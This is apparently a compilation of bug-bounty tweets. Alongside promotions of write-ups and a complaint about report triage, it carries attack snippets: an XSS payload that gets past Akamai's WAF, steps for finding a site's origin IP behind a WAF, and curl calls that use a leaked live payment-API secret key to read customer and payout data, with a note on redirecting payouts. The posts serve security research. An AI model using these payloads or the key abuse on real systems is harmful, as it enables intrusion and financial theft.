I’ve just published a write-up 👇
One endpoint, one bug, full root access.
A real-world LFI → RCE case study with a $2,500 bounty.
👇
https://t.co/Zg0MZmr3iY
#bugbountytips#bugbounty#bugbountytip
akamai waf is SO fun to fuck with. managed to bypass it with this in a JSON request (which then saved my input and output it on another endpoint)
{"ID":'0<h2 onpointerrawupdate="/*','*/prompt``">':"xss"
using onpointerrawupdate=' got blocked by waf. but flipping it to " worked
@Bugcrowd@Hacker0x01
Why not hire people like who have seen the struggle of real hunting? Why not hire people who are working day/night for years, These people are Gems, They know what are the real problems and how to overcome them.
Hire bug hunters instead of Pentesters,
Hire talent instead of certs,
Hire those who would love to build the platform.
90% reports goes to N/A because Triagers (Pentesters) couldn't understand it.
5% goes to invalid priorities.
4% goes to no response.
1% goes to accepted because ur lucky that time.
There were times when triagers (Bug hunters) help hunters to exploit their submissions to escalate the priority (Bug hunters).
vs
We don't have time to check your report, Kindly create a video because it takes time to create a new user (Pentesters).
Wanna find the origin IP?
1-Hunt for a subdomain with no WAF
2-extract the ASN
2-check it on https://t.co/w4tHJz9Jv0
3- grab the IP range, and verify a live IP.
Welcome to their world!
#bugbountytips#BugBounty
A mini-thread on how I approached this "Stored XSS with CSP Bypass" together with @confievil and popped it on our second day of hunting on that target (1/x): 👇
#bugbounty
Listing customer and payment details:
curl https://t.co/7v3cHgYGw8 -u sk_live_<key>:
Listing payment details:
curl https://t.co/bMzTUT7N3f -u sk_live_<key>:
I have retrieved the payout details; an actual attacker who wants to steal will use the POST method with the -d parameter, adding his bank account, leading to fund loss, using the curl command.
curl https://t.co/8b3AJZxOob -u sk_live_<key>:
I just published my first write up, "How I Reported Over 50 security vulnerability in a Single Program with Just the Main App in Scope" https://t.co/rJ8zK8UBYU
I have added a small update to #Reversino. I have included the ability to integrate it with Discord via webhook to receive notifications.
https://t.co/oU1eGSD9TT
#BugBounty#penetrationtest#github
1/7
I recently encountered what might be the strangest SQL Injection I’ve ever seen.
The vulnerability exists in the username parameter of a password reset form. Here's a breakdown of this bizarre find.
👇
#BugBounty
dirsearch is a fantastic tool, just you have to configure it with the right options. Sometimes, you need to be a bit aggressive/ruthless with the server.
I found a sensitive file on a server that wasn't detected by a standard dirsearch scan.
Have you had a similar experience?